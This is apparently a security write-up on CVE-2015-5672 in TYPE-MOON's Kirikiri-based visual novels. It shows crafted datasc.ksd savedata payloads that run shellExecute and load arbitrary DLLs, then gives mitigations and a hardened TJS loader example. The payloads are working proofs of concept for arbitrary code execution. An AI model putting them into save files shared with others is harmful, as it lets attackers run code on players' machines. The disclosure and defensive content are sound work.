CVE-2015-5672 is a code execution vulnerability that can be exploited through specially-crafted savedata files. It was reported to TYPE-MOON by Kazuhiko Kusano, but TYPE-MOON did not release a patch because the issue is "difficult to solve with a new patch" (see the section "The fix for this security hole"). The following products are affected:
- Fate/stay night (CD edition, DVD edition)
- Fate/hollow ataraxia
- 魔法使いの夜 (aka Mahoyo; Mahoutsukai no Yoru; Witch on the Holy Night)
- Fate/stay night + hollow ataraxia (bundle edition, セット版)
In addition to the above, I have confirmed that this issue still occurs in the following:
- Fate/stay night+hollow ataraxia reprint edition (復刻版; DMM DL version, June 28, 2019)
It is possible to open URLs using this exploit.
To open URLs, save the following contents to datasc.ksd in the savedata folder as UTF-16 with BOM:
%["hoge" => System.shellExecute("https://gist.github.com/uyjulian/ffb0cfdab167ade707e2ae8e7fe35e5c")]
After doing that, open the game. This page should appear in a browser window.
It is possible to run executables or open files.
To do that, save the following contents to datasc.ksd in the savedata folder as UTF-16 with BOM:
%["hoge" => System.shellExecute("calc.exe")]
After doing that, open the game. The "Calculator" program should appear.
You can also pass arguments:
%["hoge" => System.shellExecute("start.exe", "https://gist.github.com/uyjulian/ffb0cfdab167ade707e2ae8e7fe35e5c")]
After doing that, open the game. This webpage should appear.
Sometimes you cannot load plugins into Kirikiri because of cxdec validation or because tpm autoloading is disabled. However, there is a workaround for this.
With CVE-2015-5672, it is possible to run arbitrary TJS code from savedata files.
Save the following contents to datasc.ksd in the savedata folder as UTF-16 with BOM:
%["hoge" => Plugins.link("pluginname.dll")]
Replace pluginname.dll with the name of your plugin, which must be in the same directory as the executable (an absolute path also works).
After doing that, open the game. Your desired plugin is now loaded.
TYPE-MOON's statement reads: "This issue is difficult to solve with a new patch."
Actually, it is easy to solve this with a patch.
If you are using Kirikiri Z 1.4.0.8 or later, you can do the following:
Use Dictionary.loadStruct instead of Scripts.evalStorage. This will prevent functions from being called.
If you are using Kirikiri 2 2.30 or later, you can do the following:
Load the file with Array.load, join the lines into a single string, wrap that string with (const)[ and ], evaluate it with Scripts.eval, then take the element at index 0 of the result.
When restoring KAG bookmarks, replace the contents of f.mainConductor.macros, f.mainConductor.macroArgs, and f.mainConductor.callStack[X].lineBuffer with known-good values, because TJS code can be injected through them.
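A hardened savedata loader that follows the two fixes above, written as an added TJS2 example (not code from this gist or from Kirikiri/KAG); it assumes the engine versions named above, and the known-good values handed to sanitizeBookmark are copies the caller recorded itself at startup.

```tjs
// Added example (not from the gist or from Kirikiri/KAG): hardened loading of
// a savedata file such as datasc.ksd, in place of Scripts.evalStorage.

// Kirikiri Z 1.4.0.8 or later: loadStruct parses only literal data, so a
// System.shellExecute(...) or Plugins.link(...) call in the file cannot run.
function loadSaveDataZ(storage)
{
    var dic = %[];
    dic.loadStruct(storage);
    return dic;
}

// Kirikiri 2 2.30 or later: force the file content into a constant
// expression. Inside (const)[ ... ] only literal values are accepted, so a
// file containing a function call fails to compile instead of executing.
function loadSaveData2(storage)
{
    var lines = [];
    lines.load(storage);                       // one array element per line
    var wrapped = "(const)[\n" + lines.join("\n") + "\n]";
    var arr = Scripts.eval(wrapped, storage);  // storage name only labels errors
    return arr[0];                             // the dictionary is element 0
}

// Restoring a KAG bookmark: strings in the conductor state are later parsed
// as scenario text, so a tampered save can still inject TJS through them.
// 'known' is assumed (caller-supplied) to hold copies recorded at startup,
// e.g. %["macros" => ..., "macroArgs" => ..., "lineBuffer" => ""].
function sanitizeBookmark(f, known)
{
    var mc = f.mainConductor;
    if (mc === void) return f;
    mc.macros = known.macros;
    mc.macroArgs = known.macroArgs;
    if (mc.callStack !== void)
    {
        for (var i = 0; i < mc.callStack.count; i++)
            mc.callStack[i].lineBuffer = known.lineBuffer;
    }
    return f;
}
```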